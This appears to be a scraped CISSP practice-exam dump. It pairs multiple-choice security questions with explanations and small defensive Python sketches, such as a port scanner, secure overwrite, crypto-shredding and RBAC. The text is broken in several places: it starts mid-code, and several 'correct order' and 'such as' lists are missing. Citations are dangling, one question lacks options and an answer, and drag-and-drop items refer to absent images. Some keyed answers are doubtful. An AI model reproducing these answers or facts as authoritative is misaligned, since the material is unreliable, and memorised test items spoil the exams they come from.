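print(port.forwards_traffic())  # False: unauthorized device cannot attach
```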
What does an organization FIRST review to assure compliance with privacy requirements?
Best practices
Business objectives
Legal and regulatory mandates
Employee's compliance to policies and standards
The first thing that an organization reviews to assure compliance with privacy requirements is the legal and regulatory mandates that apply to its business operations and data processing activities. Legal and regulatory mandates are the laws, regulations, standards, and contracts that govern how an organization must protect the privacy of personal information and the rights of data subjects. An organization must identify and understand the relevant mandates that affect its jurisdiction, industry, and data types, and implement the appropriate controls and measures to comply with them. The other options are not the first thing that an organization reviews, but rather part of the privacy compliance program. Best practices are the recommended methods and techniques for achieving privacy objectives, but they are not mandatory or binding. Business objectives are the goals and strategies that an organization pursues to create value and competitive advantage, but they may not align with privacy requirements. Employee’s compliance to policies and standards is the degree to which the organization’s staff adhere to the internal rules and guidelines for privacy protection, but it is not a review activity, but rather a measurement and enforcement activity. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 3, p. 105; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 5, p. 287.
Data remanence refers to which of the following?
The remaining photons left in a fiber optic cable after a secure transmission.
The retention period required by law or regulation.
The magnetic flux created when removing the network connection from a server or personal computer.
The residual information left on magnetic storage media after a deletion or erasure.
Data remanence refers to the residual information left on magnetic storage media after a deletion or erasure. Data remanence is a security risk, as it may allow unauthorized or malicious parties to recover the deleted or erased data, which may contain sensitive or confidential information. Data remanence can be caused by the physical properties of the magnetic storage media, such as hard disks, floppy disks, or tapes, which may retain some traces of the data even after it is overwritten or formatted. Data remanence can also be caused by the logical properties of the file systems or operating systems, which may not delete or erase the data completely, but only mark the space as available or remove the pointers to the data. Data remanence can be prevented or reduced by using secure deletion or erasure methods, such as cryptographic wiping, degaussing, or physical destruction. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 7: Security Operations, p. 443; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Domain 7: Security Operations, p. 855.
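As an illustration of one remediation technique mentioned above, here is a minimal Python sketch of multi-pass overwriting before deletion. Note the caveat in the comments: on SSDs and on journaling or copy-on-write filesystems, overwriting in place is not reliable, which is why degaussing, cryptographic erasure, or physical destruction remain necessary for strong assurance.

```python
import os

# Sketch of software overwriting to reduce remanence on magnetic media:
# write random data over the file contents before unlinking. CAUTION: on
# SSDs (wear leveling) and on journaling/copy-on-write filesystems this is
# not reliable; degaussing, cryptographic erasure, or physical destruction
# are needed for strong assurance.
def overwrite_and_delete(path: str, passes: int = 3) -> None:
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for _ in range(passes):
            f.seek(0)
            f.write(os.urandom(size))
            f.flush()
            os.fsync(f.fileno())  # force each pass out to the device
    os.remove(path)
```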
The BEST example of the concept of "something that a user has" when providing an authorized user access to a computing system is
the user's hand geometry.
a credential stored in a token.
a passphrase.
the user's face.
A credential stored in a token is the best example of "something that a user has." Authentication factors fall into three categories: something you know (such as a passphrase), something you have (such as a hardware token or smart card holding a credential), and something you are (biometrics). Hand geometry and the user's face are biometric ("something you are") factors, and a passphrase is a knowledge ("something you know") factor, so only the credential stored in a token qualifies as a possession factor.
What is the difference between media marking and media labeling?
Media marking refers to the use of human-readable security attributes, while media labeling refers to the use of security attributes in internal data structures.
Media labeling refers to the use of human-readable security attributes, while media marking refers to the use of security attributes in internal data structures.
Media labeling refers to security attributes required by public policy/law, while media marking refers to security required by internal organizational policy.
Media marking refers to security attributes required by public policy/law, while media labeling refers to security attributes required by internal organizational policy.
The difference between media marking and media labeling is that media marking refers to the use of human-readable security attributes, while media labeling refers to the use of security attributes in internal data structures (see NIST SP 800-53, control MP-3). Both are techniques for applying security attributes, the tags that indicate the classification or sensitivity of media and the data they hold (for example, top secret, secret, or confidential), to physical storage media such as disks, tapes, or paper. These attributes protect the media and their contents from unauthorized access, disclosure, modification, loss, or theft, and they support access control and audit mechanisms. Media marking applies the attributes in human-readable form, such as words, symbols, or colors printed, stamped, or affixed on the media, so that the people handling the media can identify its sensitivity and handle and dispose of it properly. Media labeling applies the attributes in machine-usable form, such as bits, bytes, or fields embedded or encoded in the media, so that systems can validate the attributes and enforce and monitor access control and audit mechanisms. The options that distinguish the two terms by the source of the requirement (public policy/law versus internal organizational policy) are incorrect, because the distinction is not about who requires the security attributes but about how the attributes are represented: either kind of requirement, whether for Controlled Unclassified Information (CUI), Personally Identifiable Information (PII), or proprietary information, can be satisfied by marking, labeling, or both.
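The contrast is easiest to see side by side. In this Python sketch, the same security attribute is rendered once as a human-readable marking and once packed into a hypothetical internal header; the 4-byte format and magic number are invented for illustration.

```python
import struct
from dataclasses import dataclass

# The same security attribute rendered two ways: as a human-readable
# marking (for people handling the media) and packed into a hypothetical
# internal header (for systems enforcing access control). The 4-byte
# format and magic number are invented for illustration.
LEVELS = {0: "UNCLASSIFIED", 1: "CONFIDENTIAL", 2: "SECRET", 3: "TOP SECRET"}

@dataclass
class SecurityAttribute:
    level: int  # index into LEVELS

def human_readable_marking(attr: SecurityAttribute) -> str:
    """Marking: what gets printed or stamped on the media."""
    return f"*** {LEVELS[attr.level]} ***"

def internal_label(attr: SecurityAttribute) -> bytes:
    """Labeling: the attribute embedded in an internal data structure."""
    return struct.pack("!HH", 0x5EC0, attr.level)  # magic + level field

attr = SecurityAttribute(level=3)
print(human_readable_marking(attr))  # *** TOP SECRET ***
print(internal_label(attr).hex())    # 5ec00003
```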
When designing a vulnerability test, which one of the following is likely to give the BEST indication of what components currently operate on the network?
Topology diagrams
Mapping tools
Asset register
Ping testing
According to the CISSP All-in-One Exam Guide2, when designing a vulnerability test, mapping tools are likely to give the best indication of what components currently operate on the network. Mapping tools are software applications that scan and discover the network topology, devices, services, and protocols. They can provide a graphical representation of the network structure and components, as well as detailed information about each node and connection. Mapping tools can help identify potential vulnerabilities and weaknesses in the network configuration and architecture, as well as the exposure and attack surface of the network. Topology diagrams are not likely to give the best indication of what components currently operate on the network, as they may be outdated, inaccurate, or incomplete. Topology diagrams are static and abstract representations of the network layout and design, but they may not reflect the actual and dynamic state of the network. Asset register is not likely to give the best indication of what components currently operate on the network, as it may be outdated, inaccurate, or incomplete. Asset register is a document that lists and categorizes the assets owned by an organization, such as hardware, software, data, and personnel. However, it may not capture the current status, configuration, and interconnection of the assets, as well as the changes and updates that occur over time. Ping testing is not likely to give the best indication of what components currently operate on the network, as it is a simple and limited technique that only checks the availability and response time of a host. Ping testing is a network utility that sends an echo request packet to a target host and waits for an echo reply packet. It can measure the connectivity and latency of the host, but it cannot provide detailed information about the host’s characteristics, services, and vulnerabilities. References: 2
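As a toy version of what mapping tools automate, the following Python sketch probes each host in a subnet for a few well-known open TCP ports; the subnet and port list are illustrative assumptions, and real tools such as Nmap do far more (service fingerprinting, OS detection, topology inference).

```python
import socket
from ipaddress import ip_network

# Toy network mapper: attempt TCP connections to a few well-known ports on
# each host in a subnet. The subnet and port list are illustrative
# assumptions; real mapping tools (e.g., Nmap) add service fingerprinting,
# OS detection, and topology inference.
SUBNET = "192.168.1.0/28"
PORTS = [22, 80, 443, 3389]

def scan(subnet: str, ports: list) -> dict:
    found = {}
    for host in ip_network(subnet).hosts():
        open_ports = []
        for port in ports:
            try:
                with socket.create_connection((str(host), port), timeout=0.3):
                    open_ports.append(port)
            except OSError:
                pass  # closed, filtered, or host unreachable
        if open_ports:
            found[str(host)] = open_ports
    return found

if __name__ == "__main__":
    for host, open_ports in scan(SUBNET, PORTS).items():
        print(f"{host}: open TCP ports {open_ports}")
```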
Which of the following is the PRIMARY reason to perform regular vulnerability scanning of an organization network?
Provide vulnerability reports to management.
Validate vulnerability remediation activities.
Prevent attackers from discovering vulnerabilities.
Remediate known vulnerabilities.
According to the CISSP Official (ISC)2 Practice Tests, the primary reason to perform regular vulnerability scanning of an organization's network is to remediate known vulnerabilities. Vulnerability scanning is the process of identifying and measuring the weaknesses and exposures in a system, network, or application that threats may exploit, using tools and methods such as automated scanners, manual tests, or penetration tests. Regular scanning exists chiefly to drive remediation: fixing, mitigating, or eliminating the vulnerabilities it discovers, which improves the security posture and reduces overall risk to an acceptable level. Providing vulnerability reports to management is a useful outcome, not the primary reason; reports document the scope, methods, results, and recommendations of a scan and support decision making, but they are a means to remediation rather than the end. Validating vulnerability remediation activities is a step within the process, not the primary reason; it verifies that fixes such as patching, updating, or reconfiguring were effective and complete and introduced no new or residual weaknesses. Preventing attackers from discovering vulnerabilities is likewise not the primary reason; techniques such as encryption, obfuscation, or deception may reduce an attacker's opportunity, but they do not address the root cause or the impact of the vulnerabilities themselves.
An organization lacks a data retention policy. Of the following, who is the BEST person to consult for such requirement?
Application Manager
Database Administrator
Privacy Officer
Finance Manager
The best person to consult for a data retention policy requirement is the privacy officer, who is responsible for ensuring that the organization complies with the applicable privacy laws, regulations, and standards. A data retention policy defines the criteria and procedures for retaining, storing, and disposing of data, especially personal data, in accordance with the legal and business requirements. The privacy officer can advise on the data retention policy by identifying the relevant privacy mandates, assessing the data types and categories, determining the retention periods and disposal methods, and implementing the appropriate controls and measures. The other options are not the best person to consult, but rather stakeholders or contributors to the data retention policy. An application manager is responsible for managing the development, maintenance, and operation of applications, but not the data retention policy. A database administrator is responsible for managing the design, implementation, and performance of databases, but not the data retention policy. A finance manager is responsible for managing the financial resources and activities of the organization, but not the data retention policy. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 3, p. 118; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 5, p. 292; CISSP practice exam questions and answers, Question 8.
The PRIMARY characteristic of a Distributed Denial of Service (DDoS) attack is that it
exploits weak authentication to penetrate networks.
can be detected with signature analysis.
looks like normal network activity.
is commonly confused with viruses or worms.
The primary characteristic of a Distributed Denial of Service (DDoS) attack is that it looks like normal network activity. A DDoS attack aims to disrupt or degrade the availability or performance of a system or service by flooding it with a high volume of traffic or requests from many distributed sources, typically compromised computers, devices, or networks coordinated by the attacker. Because each individual request can be well-formed and each source can stay within plausible limits, it is difficult to distinguish the malicious traffic from legitimate traffic, and therefore difficult to block or filter the attack without also affecting legitimate users. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 4, page 115; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 4, page 172
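The "looks like normal activity" point can be illustrated with a toy detector: a per-source rate threshold catches a single noisy client but misses the same aggregate load spread across many sources. All numbers below are illustrative assumptions.

```python
from collections import Counter

# Why DDoS traffic "looks normal": a per-source rate threshold flags one
# noisy client but misses the same aggregate load spread across many
# sources. All numbers are illustrative assumptions.
PER_SOURCE_LIMIT = 100  # requests per interval one client may send

def flagged_sources(request_sources: list) -> list:
    counts = Counter(request_sources)
    return [src for src, n in counts.items() if n > PER_SOURCE_LIMIT]

# Single-source DoS: 5,000 requests from one address -- easily flagged.
dos = ["203.0.113.7"] * 5000
print(flagged_sources(dos))   # ['203.0.113.7']

# DDoS: the same 5,000 requests from 1,000 bots, 5 each -- nothing flagged,
# although the aggregate load on the victim is identical.
ddos = [f"bot-{i}" for i in range(1000) for _ in range(5)]
print(flagged_sources(ddos))  # []
```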
Which of the following BEST avoids data remanence disclosure for cloud hosted resources?
Strong encryption and deletion of the keys after data is deleted.
Strong encryption and deletion of the virtual host after data is deleted.
Software based encryption with two factor authentication.
Hardware based encryption on dedicated physical servers.
The best way to avoid data remanence disclosure for cloud-hosted resources is strong encryption combined with deletion of the keys after the data is deleted, a technique known as cryptographic erasure or crypto-shredding. Data remanence is the residual data that remains on storage media after deletion or overwriting, and it poses a risk of leakage or unauthorized access if the media is reused, recycled, or disposed of without proper sanitization. In a cloud environment the customer cannot physically sanitize the provider's media, and deleting a virtual host merely returns the underlying storage blocks, data intact, to the provider's allocation pool. If the data was strongly encrypted throughout its life and the keys are securely destroyed once the data is deleted, any remanent ciphertext that is later recovered is computationally unusable.
References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 5, page 282; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 5, page 247
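Here is a minimal sketch of cryptographic erasure using the third-party cryptography package; the key handling is deliberately simplified (a real system would wipe key material in an HSM or KMS rather than rely on del).

```python
from cryptography.fernet import Fernet, InvalidToken

# Sketch of cryptographic erasure ("crypto-shredding") with the third-party
# cryptography package: data exists only as ciphertext, so destroying the
# key renders every replica unrecoverable wherever the provider copied it.
# Key handling is deliberately simplified; real systems wipe key material
# inside an HSM or KMS rather than relying on `del`.
key = Fernet.generate_key()
ciphertext = Fernet(key).encrypt(b"customer PII record")

# ... ciphertext may be replicated across disks, zones, and backups ...

del key  # stands in for secure destruction of the key material

# Remanent ciphertext recovered from reused storage is unusable without
# the destroyed key; decryption with any other key raises InvalidToken.
try:
    Fernet(Fernet.generate_key()).decrypt(ciphertext)
except InvalidToken:
    print("remanent ciphertext is unreadable without the destroyed key")
```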
Which of the following BEST describes the purpose of the security functional requirements of Common Criteria?
Level of assurance of the Target of Evaluation (TOE) in intended operational environment
Selection to meet the security objectives stated in test documents
Security behavior expected of a TOE
Definition of the roles and responsibilities
The security functional requirements of Common Criteria are meant to describe the expected security behavior of a Target of Evaluation (TOE). These requirements are detailed and are used to evaluate the security functions that a TOE claims to implement.
References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 4, page 211; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 4, page 178
Which of the following is the MOST important goal of information asset valuation?
Developing a consistent and uniform method of controlling access on information assets
Developing appropriate access control policies and guidelines
Assigning a financial value to an organization’s information assets
Determining the appropriate level of protection
According to the CISSP All-in-One Exam Guide2, the most important goal of information asset valuation is to assign a financial value to an organization’s information assets. Information asset valuation is the process of estimating the worth or importance of the information assets that an organization owns, creates, uses, or maintains, such as data, documents, records, or intellectual property. Information asset valuation helps the organization to measure the impact and return of its information assets, as well as to determine the appropriate level of protection, investment, and management for them. Information asset valuation also helps the organization to comply with the legal, regulatory, and contractual obligations that may require the disclosure or reporting of the value of its information assets. Developing a consistent and uniform method of controlling access on information assets is not the most important goal of information asset valuation, although it may be a benefit or outcome of it. Controlling access on information assets is the process of granting or denying the rights and permissions to access, use, modify, or disclose the information assets, based on the identity, role, or need of the users or processes. Controlling access on information assets helps the organization to protect the confidentiality, integrity, and availability of its information assets, as well as to enforce the security policies and standards for them. Developing appropriate access control policies and guidelines is not the most important goal of information asset valuation, although it may be a benefit or outcome of it. Access control policies and guidelines are the documents that define the rules, principles, and procedures for controlling access on information assets, as well as the roles and responsibilities of the stakeholders involved. Access control policies and guidelines help the organization to establish and communicate the expectations and requirements for controlling access on information assets, as well as to monitor and audit the compliance and effectiveness of the access control mechanisms. Determining the appropriate level of protection is not the most important goal of information asset valuation, although it may be a benefit or outcome of it. The level of protection is the degree or extent of the security measures and controls that are applied to the information assets, to prevent or mitigate the potential threats and risks that may affect them. The level of protection should be proportional to the value and sensitivity of the information assets, as well as the impact and likelihood of the threats and risks. References: 2
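Assigning financial values is what makes the standard quantitative risk formulas usable: single loss expectancy is asset value times exposure factor (SLE = AV × EF), and annualized loss expectancy is SLE times the annualized rate of occurrence (ALE = SLE × ARO). A minimal worked example in Python, with all input numbers as illustrative assumptions:

```python
# Quantitative risk metrics built on asset valuation. All input values are
# illustrative assumptions.
asset_value = 500_000.00          # AV: financial value assigned to the asset
exposure_factor = 0.30            # EF: fraction of value lost per incident
annual_rate_of_occurrence = 0.5   # ARO: expected incidents per year

single_loss_expectancy = asset_value * exposure_factor  # SLE = AV * EF
annual_loss_expectancy = single_loss_expectancy * annual_rate_of_occurrence  # ALE = SLE * ARO

print(f"SLE = ${single_loss_expectancy:,.0f}")  # SLE = $150,000
print(f"ALE = ${annual_loss_expectancy:,.0f}")  # ALE = $75,000
```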
During the risk assessment phase of the project the CISO discovered that a college within the University is collecting Protected Health Information (PHI) data via an application that was developed in-house. The college collecting this data is fully aware of the regulations for Health Insurance Portability and Accountability Act (HIPAA) and is fully compliant.
What is the best approach for the CISO?
Below are the common phases to creating a Business Continuity/Disaster Recovery (BC/DR) plan. Drag the remaining BC\DR phases to the appropriate corresponding location.
The common phases to creating a Business Continuity/Disaster Recovery (BC/DR) plan are as follows:
The image shows a flowchart with five empty boxes connected by arrows, indicating a sequence of steps; the boxes are placeholders for the phases of the BC/DR plan, and below the image is a list of the phases to be dragged into the appropriate boxes. The correct order of the phases is as follows:
The phase of Plan Maintenance is not shown in the image, but it is an ongoing and continuous phase that should be performed after the completion of the other phases.
A proxy firewall operates at what layer of the Open System Interconnection (OSI) model?
Transport
Data link
Network
Application
According to the CISSP Official (ISC)2 Practice Tests2, a proxy firewall operates at the application layer of the Open System Interconnection (OSI) model. The OSI model is a conceptual framework that describes how data is transmitted and processed across a network, by dividing the functions into seven layers: physical, data link, network, transport, session, presentation, and application. A proxy firewall is a type of firewall that acts as an intermediary between the source and the destination of a network connection, by intercepting and inspecting the data packets at the application layer, which is the highest layer of the OSI model. The application layer is responsible for providing the interface and services for the applications and processes that communicate over the network, such as HTTP, FTP, SMTP, and DNS. A proxy firewall can filter and control the network traffic based on the content and context of the application layer protocols and messages, as well as perform caching, authentication, encryption, and logging functions. A proxy firewall does not operate at the transport layer, the data link layer, or the network layer of the OSI model, as these are lower layers that provide different functions, such as reliable and ordered delivery of data, physical and logical addressing of devices, and routing and forwarding of packets. References: 2
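For illustration, the following Python sketch shows the defining behavior of an application-layer proxy: it parses the HTTP request itself and applies a content-aware rule before forwarding. The blocklist, listening port, and plain-HTTP-only handling are toy assumptions; real proxy firewalls add full protocol parsing, caching, authentication, and logging.

```python
import socket
import threading

# Toy application-layer proxy: it parses the HTTP request itself and applies
# a content-aware rule before forwarding. Blocklist, port, and plain-HTTP
# handling are toy assumptions.
BLOCKED_HOSTS = {"malware.example.com"}  # illustrative policy

def handle(client: socket.socket) -> None:
    with client:
        request = client.recv(65535)
        host = ""
        for line in request.split(b"\r\n"):          # application-layer inspection
            if line.lower().startswith(b"host:"):
                host = line.split(b":", 1)[1].strip().decode().split(":")[0]
        if not host:
            client.sendall(b"HTTP/1.1 400 Bad Request\r\n\r\n")
            return
        if host in BLOCKED_HOSTS:
            client.sendall(b"HTTP/1.1 403 Forbidden\r\n\r\nBlocked by proxy\r\n")
            return
        with socket.create_connection((host, 80)) as upstream:
            upstream.sendall(request)                # relay on the client's behalf
            while chunk := upstream.recv(65535):
                client.sendall(chunk)

def serve(port: int = 8080) -> None:
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("127.0.0.1", port))
        srv.listen()
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=handle, args=(conn,), daemon=True).start()
```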
In which order, from MOST to LEAST impacted, does user awareness training reduce the occurrence of the events below?
The correct order is:
User awareness training is a process of educating and informing users about the security policies, procedures, and best practices of an organization. User awareness training can help reduce the occurrence of security events by increasing the users’ knowledge, skills, and attitude towards security. User awareness training can have different impacts on different types of security events, depending on the nature and source of the events. The order of impact from most to least is as follows:
References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 7: Security Operations, p. 440; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Domain 7: Security Operations, p. 852.
A security professional is asked to provide a solution that restricts a bank teller to only perform a savings deposit transaction but allows a supervisor to perform corrections after the transaction. Which of the following is the MOST effective solution?
Access is based on rules.
Access is determined by the system.
Access is based on user's role.
Access is based on data sensitivity.
The most effective solution is access based on the user's role, that is, role-based access control (RBAC). RBAC grants or denies access to resources and transactions according to the user's role or function within the organization, such as bank teller or supervisor, rather than according to individual identities. It prevents users from performing actions outside their role, and it simplifies administration because permissions are assigned to predefined roles rather than configured per person. Here, the teller role would be limited to the savings deposit transaction, while the supervisor role would additionally be permitted to perform corrections after the transaction, which is exactly the required separation.
References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 5, page 147; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 5, page 212
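A minimal sketch of the role-based check in Python; the role names and permission strings are illustrative assumptions.

```python
# Minimal role-based access control check for the teller/supervisor case.
# Role names and permission strings are illustrative assumptions.
PERMISSIONS = {
    "teller": {"savings_deposit"},
    "supervisor": {"savings_deposit", "transaction_correction"},
}

def is_allowed(role: str, action: str) -> bool:
    """Grant access based on the user's role, not the individual user."""
    return action in PERMISSIONS.get(role, set())

assert is_allowed("teller", "savings_deposit")
assert not is_allowed("teller", "transaction_correction")  # teller restricted
assert is_allowed("supervisor", "transaction_correction")  # supervisor may correct
```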
Which of the following is a web application control that should be put into place to prevent exploitation of Operating System (OS) bugs?
Check arguments in function calls
Test for the security patch level of the environment
Include logging functions
Digitally sign each application module
Testing for the security patch level of the environment is the web application control that should be put into place to prevent exploitation of Operating System (OS) bugs. OS bugs are errors or defects in the code or logic of the OS that can cause the OS to malfunction or behave unexpectedly. OS bugs can be exploited by attackers to gain unauthorized access, disrupt business operations, or steal or leak sensitive data. Testing for the security patch level of the environment is the web application control that should be put into place to prevent exploitation of OS bugs, because it can provide several benefits, such as:
The other options are not the web application controls that should be put into place to prevent exploitation of OS bugs, but rather web application controls that can prevent or mitigate other types of web application attacks or issues. Checking arguments in function calls is a web application control that can prevent or mitigate buffer overflow attacks, which are attacks that exploit the vulnerability of the web application code that does not properly check the size or length of the input data that is passed to a function or a variable, and overwrite the adjacent memory locations with malicious code or data. Including logging functions is a web application control that can prevent or mitigate unauthorized access or modification attacks, which are attacks that exploit the lack of or weak authentication or authorization mechanisms of the web applications, and access or modify the web application data or functionality without proper permission or verification. Digitally signing each application module is a web application control that can prevent or mitigate code injection or tampering attacks, which are attacks that exploit the vulnerability of the web application code that does not properly validate or sanitize the input data that is executed or interpreted by the web application, and inject or modify the web application code with malicious code or data.
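As a sketch of what "testing for the security patch level of the environment" can look like in practice, the following Python snippet refuses to start when the runtime is older than a known-patched baseline; the threshold version is a hypothetical placeholder, not a real advisory.

```python
import sys

# Sketch of testing the patch level of the environment: refuse to start on
# a runtime older than a known-patched baseline. The threshold version is a
# hypothetical placeholder, not a real advisory.
MINIMUM_PATCHED = (3, 9, 2)

def environment_is_patched() -> bool:
    return sys.version_info[:3] >= MINIMUM_PATCHED

if not environment_is_patched():
    raise SystemExit(
        f"refusing to start: runtime {sys.version.split()[0]} is below "
        f"patched baseline {'.'.join(map(str, MINIMUM_PATCHED))}"
    )
```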
Which of the following is the BEST method to prevent malware from being introduced into a production environment?
Purchase software from a limited list of retailers
Verify the hash key or certificate key of all updates
Do not permit programs, patches, or updates from the Internet
Test all new software in a segregated environment
Testing all new software in a segregated environment is the best method to prevent malware from being introduced into a production environment. Malware is any malicious software that can harm or compromise the security, availability, integrity, or confidentiality of a system or data. Malware can be introduced into a production environment through various sources, such as software downloads, updates, patches, or installations. Testing all new software in a segregated environment involves verifying and validating the functionality and security of the software before deploying it to the production environment, using a separate system or network that is isolated and protected from the production environment. Testing all new software in a segregated environment can provide several benefits, such as:
The other options are not the best methods to prevent malware from being introduced into a production environment, but rather methods that can reduce or mitigate the risk of malware, but not eliminate it. Purchasing software from a limited list of retailers is a method that can reduce the risk of malware from being introduced into a production environment, but not prevent it. This method involves obtaining software only from trusted and reputable sources, such as official vendors or distributors, that can provide some assurance of the quality and security of the software. However, this method does not guarantee that the software is free of malware, as it may still contain hidden or embedded malware, or it may be tampered with or compromised during the delivery or installation process. Verifying the hash key or certificate key of all updates is a method that can reduce the risk of malware from being introduced into a production environment, but not prevent it. This method involves checking the authenticity and integrity of the software updates, patches, or installations, by comparing the hash key or certificate key of the software with the expected or published value, using cryptographic techniques and tools. However, this method does not guarantee that the software is free of malware, as it may still contain malware that is not detected or altered by the hash key or certificate key, or it may be subject to a man-in-the-middle attack or a replay attack that can intercept or modify the software or the key. Not permitting programs, patches, or updates from the Internet is a method that can reduce the risk of malware from being introduced into a production environment, but not prevent it. This method involves restricting or blocking the access or download of software from the Internet, which is a common and convenient source of malware, by applying and enforcing the appropriate security policies and controls, such as firewall rules, antivirus software, or web filters. However, this method does not guarantee that the software is free of malware, as it may still be obtained or infected from other sources, such as removable media, email attachments, or network shares.
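The hash-verification control discussed above is straightforward to sketch. The following Python snippet compares a downloaded update's SHA-256 digest against a published value before installation; the expected digest shown is a placeholder (it is the digest of the empty string), and the quarantine step is an assumption about workflow.

```python
import hashlib

# Verify a downloaded update against the vendor's published SHA-256 digest
# before installing. The digest below is a placeholder (it is the SHA-256
# of the empty string), and the quarantine step is a workflow assumption.
PUBLISHED_SHA256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"

def digest_matches(path: str, expected_hex: str) -> bool:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):  # stream large files
            h.update(chunk)
    return h.hexdigest() == expected_hex

# Install only on a match; otherwise quarantine the file for analysis in
# the segregated test environment.
```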
The configuration management and control task of the certification and accreditation process is incorporated in which phase of the System Development Life Cycle (SDLC)?
System acquisition and development
System operations and maintenance
System initiation
System implementation
The configuration management and control task of the certification and accreditation process is incorporated in the system acquisition and development phase of the System Development Life Cycle (SDLC). The SDLC is a process that involves planning, designing, developing, testing, deploying, operating, and maintaining a system, using various models and methodologies, such as waterfall, spiral, agile, or DevSecOps. The SDLC can be divided into several phases, each with its own objectives and activities, such as:
The certification and accreditation process is a process that involves assessing and verifying the security and compliance of a system, and authorizing and approving the system operation and maintenance, using various standards and frameworks, such as NIST SP 800-37 or ISO/IEC 27001. The certification and accreditation process can be divided into several tasks, each with its own objectives and activities, such as:
The configuration management and control task of the certification and accreditation process is incorporated in the system acquisition and development phase of the SDLC, because it can ensure that the system design and development are consistent and compliant with the security objectives and requirements, and that the system changes are controlled and documented. Configuration management and control is a process that involves establishing and maintaining the baseline and the inventory of the system components and resources, such as hardware, software, data, or documentation, and tracking and recording any modifications or updates to the system components and resources, using various techniques and tools, such as version control, change control, or configuration audits. Configuration management and control can provide several benefits, such as:
The other options are not the phases of the SDLC that incorporate the configuration management and control task of the certification and accreditation process, but rather phases that involve other tasks of the certification and accreditation process. System operations and maintenance is a phase of the SDLC that incorporates the security monitoring task of the certification and accreditation process, because it can ensure that the system operation and maintenance are consistent and compliant with the security objectives and requirements, and that the system security is updated and improved. System initiation is a phase of the SDLC that incorporates the security categorization and security planning tasks of the certification and accreditation process, because it can ensure that the system scope and objectives are defined and aligned with the security objectives and requirements, and that the security plan and policy are developed and documented. System implementation is a phase of the SDLC that incorporates the security assessment and security authorization tasks of the certification and accreditation process, because it can ensure that the system deployment and installation are evaluated and verified for the security effectiveness and compliance, and that the system operation and maintenance are authorized and approved based on the risk and impact analysis and the security objectives and requirements.
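A toy illustration of the configuration management and control idea, in Python: fingerprint the approved baseline, then detect drift that should trigger change control. The configuration keys are illustrative assumptions.

```python
import hashlib
import json

# Toy configuration-baseline check in the spirit of configuration management
# and control: fingerprint the approved configuration, then detect drift
# that should go through change control. The keys are illustrative.
def fingerprint(config: dict) -> str:
    return hashlib.sha256(json.dumps(config, sort_keys=True).encode()).hexdigest()

baseline = {"tls_min_version": "1.2", "admin_port": 8443, "debug": False}
approved = fingerprint(baseline)

running = dict(baseline, debug=True)  # an uncontrolled change crept in
if fingerprint(running) != approved:
    print("configuration drift detected; raise a change-control ticket")
```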
What is the BEST approach to addressing security issues in legacy web applications?
Debug the security issues
Migrate to newer, supported applications where possible
Conduct a security assessment
Protect the legacy application with a web application firewall
Migrating to newer, supported applications where possible is the best approach to addressing security issues in legacy web applications. Legacy web applications are web applications that are outdated, unsupported, or incompatible with the current technologies and standards. Legacy web applications may have various security issues, such as unpatched or unpatchable vulnerabilities, weak or outdated encryption and authentication mechanisms, and incompatibility with modern security controls.
Migrating to newer, supported applications where possible is the best approach to addressing security issues in legacy web applications because it addresses the root cause: supported applications receive vendor patches and updates, and remain compatible with current technologies, standards, and security controls.
The other options are not the best approaches to addressing security issues in legacy web applications, but rather approaches that can mitigate or remediate the security issues, but not eliminate or prevent them. Debugging the security issues is an approach that can mitigate the security issues in legacy web applications, but not the best approach, because it involves identifying and fixing the errors or defects in the code or logic of the web applications, which may be difficult or impossible to do for the legacy web applications that are outdated or unsupported. Conducting a security assessment is an approach that can remediate the security issues in legacy web applications, but not the best approach, because it involves evaluating and testing the security effectiveness and compliance of the web applications, using various techniques and tools, such as audits, reviews, scans, or penetration tests, and identifying and reporting any security weaknesses or gaps, which may not be sufficient or feasible to do for the legacy web applications that are incompatible or obsolete. Protecting the legacy application with a web application firewall is an approach that can mitigate the security issues in legacy web applications, but not the best approach, because it involves deploying and configuring a web application firewall, which is a security device or software that monitors and filters the web traffic between the web applications and the users or clients, and blocks or allows the web requests or responses based on the predefined rules or policies, which may not be effective or efficient to do for the legacy web applications that have weak or outdated encryption or authentication mechanisms.
What technique BEST describes antivirus software that detects viruses by watching anomalous behavior?
Signature
Inference
Induction
Heuristic
Heuristic is the technique that best describes antivirus software that detects viruses by watching anomalous behavior. Heuristic is a method of virus detection that analyzes the behavior and characteristics of the program or file, rather than comparing it to a known signature or pattern. Heuristic analysis can detect unknown or new viruses that have not been identified or cataloged by the antivirus software. However, it can also generate false positives, as some legitimate programs or files may exhibit suspicious or unusual behavior. References: What is Heuristic Analysis?; Heuristic Virus Detection.
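To make the contrast with signature matching concrete, here is a toy sketch; the behavior names, weights, and threshold are invented for illustration and are far simpler than real heuristic engines:

```python
# Signature detection: exact match against known byte patterns.
KNOWN_SIGNATURES = {b"\xde\xad\xbe\xef"}  # invented signature

def signature_scan(sample: bytes) -> bool:
    return any(sig in sample for sig in KNOWN_SIGNATURES)

# Heuristic detection: weight observed behaviors and flag above a threshold.
SUSPICIOUS_WEIGHTS = {
    "writes_to_system_directory": 3,
    "disables_security_software": 5,
    "replicates_itself": 5,
    "opens_many_outbound_connections": 2,
}
THRESHOLD = 6

def heuristic_scan(behaviors: list[str]) -> bool:
    return sum(SUSPICIOUS_WEIGHTS.get(b, 0) for b in behaviors) >= THRESHOLD

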